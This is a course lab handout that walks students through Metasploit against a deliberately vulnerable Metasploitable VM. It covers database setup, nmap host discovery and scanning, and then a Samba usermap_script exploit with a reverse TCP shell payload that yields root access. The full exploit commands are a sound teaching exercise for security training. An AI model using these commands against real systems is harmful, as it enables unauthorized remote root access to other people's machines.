Title

Lab: Penetration testing #2: Metasploit, exploits, and payloads

Nothing to hand in

(No hurry required. You'll be lucky to finish Part 1 in class today.)

This lab will give you a brief tour of some of the capabilities of Metasploit, a security tool that supports the development and use of vulnerability exploits. Like any tool (e.g. a good sharp knife), Metasploit can be used for good or evil. When we take the perspective of penetration testers interested in helping organizations enhance their security, a tool like Metasploit is invaluable.

Part 1: a quick spin through some Metasploit basics

Nothing to hand in for this part, but you'll need to understand the material in Part 1 to do Parts 2, 3, and 4.

• Launch your virtual machines Fire up VMWare and launch both the Kali and Metasploitable VMs. Login to both (recall that the user name and password for Metasploitable are both "msfadmin").

  On Metasploitable, run "ifconfig" and check the IP address for eth0. For my setup, it's 10.0.2.4. Doing the same on Kali gives me 10.0.2.15. So every time I mention 10.0.2.4 below, I'm talking about Metasploitable's eth0 IP address, and 10.0.2.15 is my Kali eth0 IP address. If your eth0's are different, adjust your commands in the following stages accordingly.

• Use the Metasploit database

  When you're hunting for vulnerabilities on a target system, you can end up collecting a lot of information. To help you keep track, Metasploit supports a database that automatically populates with what the information you uncover.

  To start using the Metasploit database, here's what you do.

  • Login to Kali an admin account ("kali" will do) and open a terminal.
  • Start a postgresql server. In your terminal, run
    systemctl start postgresql
  • Create and initialize a Metasploit database.
    msfdb init
    (Kali may insist that you run this as root, like so: "sudo msfdb init".)
• Launch msfconsole

  Most of the rest of your work will take place in the Metasploit Framework Console, a command-line interface. Just run this in your Kali terminal:

  msfconsole

  That should give you a "msf6 >" prompt.

  (HEY, READ THIS: From here on out, unless I specify otherwise, all commands are to be issued at the msfconsole prompt.)

• Create a workspace

  You can separate your msfconsole and database collections into "workspaces" to help you keep track of different projects. Create a new workspace:

  workspace -a whatever

  You can take a look at the available workspaces:

  workspace

  or switch between workspaces:

  workspace nameofdesiredworkspace
• Host discovery

  To do an nmap-based host discovery like you did in your first pen-testing assignment, you use "db_nmap" at the Metasploitable prompt. (The beautiful thing about doing this instead of "nmap" at the Linux prompt is that Metasploitable will run the command and store the results in the Metasploit database where you'll be able to retrieve those results easily later.)

  db_nmap -sn 10.0.2.0/24

  Now you can take a look at the hosts discovered:

  hosts
• Port scanning

  Suppose you want to do an "aggressive" scan of 10.0.2.4 for open ports and the services running on them.

  db_nmap -A 10.0.2.4

  Once that scan is complete, you can take a look at the services that the scan discovered:

  services

  Since we've now learned more about 10.0.2.4 than we knew before, try doing the "hosts" command again. Do you see a change since you last executed "hosts"? (You should. And this illustrates some of the power of having an automatically populated database. You don't have to save the results of db_nmap yourself; Metasploit does it for you.)

• Choosing a vulnerable port and corresponding exploit

  Now that you have a list of services on the target machine, you can use that list to investigate possible attacks. There are more sophisticated ways to do this, but let's start simple: we'll search the internet for exploits.

  An exploit is a piece of code that runs on our own machine and attempts to take advantage of a bug in some server software to enable us to do something to the target machine. When we run an exploit, we usually provide the exploit with a payload, that is, a piece of software that will run on the target machine to accomplish our goals. A very common (and desirable) payload type is a shell—that is, an interface through which we can execute arbitrary commands on the target system.

  In our case, when I ran a port scan on 10.0.2.4 (my Metasploitable's IP address) and then looked at the available services, one of the services I saw was a version of the Samba file server software:

  10.0.2.4 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP

  Googling for "Samba smbd 3.X - 4.X workgroup: WORKGROUP vulnerabilities", I found myself at this Rapid7 vulnerability database page (note that Rapid7 owns and maintains the Metasploit project). This page tells me to try the "exploit/multi/samba/usermap_script" module. So:

  use exploit/multi/samba/usermap_script

  This causes my msfconsole prompt to reflect the module I'm currently using:

  msf exploit(multi/samba/usermap_script) >

  This prompt doesn't mean that I've already launched my attack with this exploit. It just says "you're working on the usermap_script exploit". There are several steps left before I'm ready to actually launch the attack against Metasploitable.

• Setting up the exploit's options

  Once I'm using my particular exploit, I need to set up its parameters, known in Metasploit as "options". First step, see what those options are:

  show options

  This gives me a listing like this:

  Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target host(s),... RPORT 139 yes The target port (TCP)

  The RHOST option obviously needs to be set, to tell the exploit what IP address we're attacking. Assuming 10.0.2.4 is my target machine's IP:

  set RHOST 10.0.2.4

  Then run "show options" again to see if things are set the way you want them.

• Setting up the payload

  Next up, find out what payloads Metasploit has that are compatible with our exploit:

  show payloads

  In this case, we get a long list of possible payloads. One of the command-shell payloads listed is "cmd/unix/reverse" (where "reverse" refers to a "reverse TCP shell" in which the payload running on the target machine initiates a TCP connection with our attacking machine rather than the other way around). To set up the payload:

  set PAYLOAD cmd/unix/reverse

  Then see what options the payload requires:

  show options

  The required option we see now is LHOST. It's possible Metasploit pre-filled LHOST with 10.0.2.15 (Kali's eth0 address). But if LHOST's current setting is blank, do this:

  set LHOST 10.0.2.15

  Now we're all set to try out the attack.

• Running the exploit.
exploit

Do you get a shell? The exploit's own logging message might tell you yes or no. If you do, it's likely you won't see a prompt. So just try a Unix command like "ls -l" or "pwd" to figure out what directory you're in. You can also try the "whoami" command in this illicit non-prompt prompt. When I do so, I get "root", which tells me that I'm free to wreak a great deal of havoc on the Metasploitable machine.

Part 2: Find me an exploit

...see the final exam...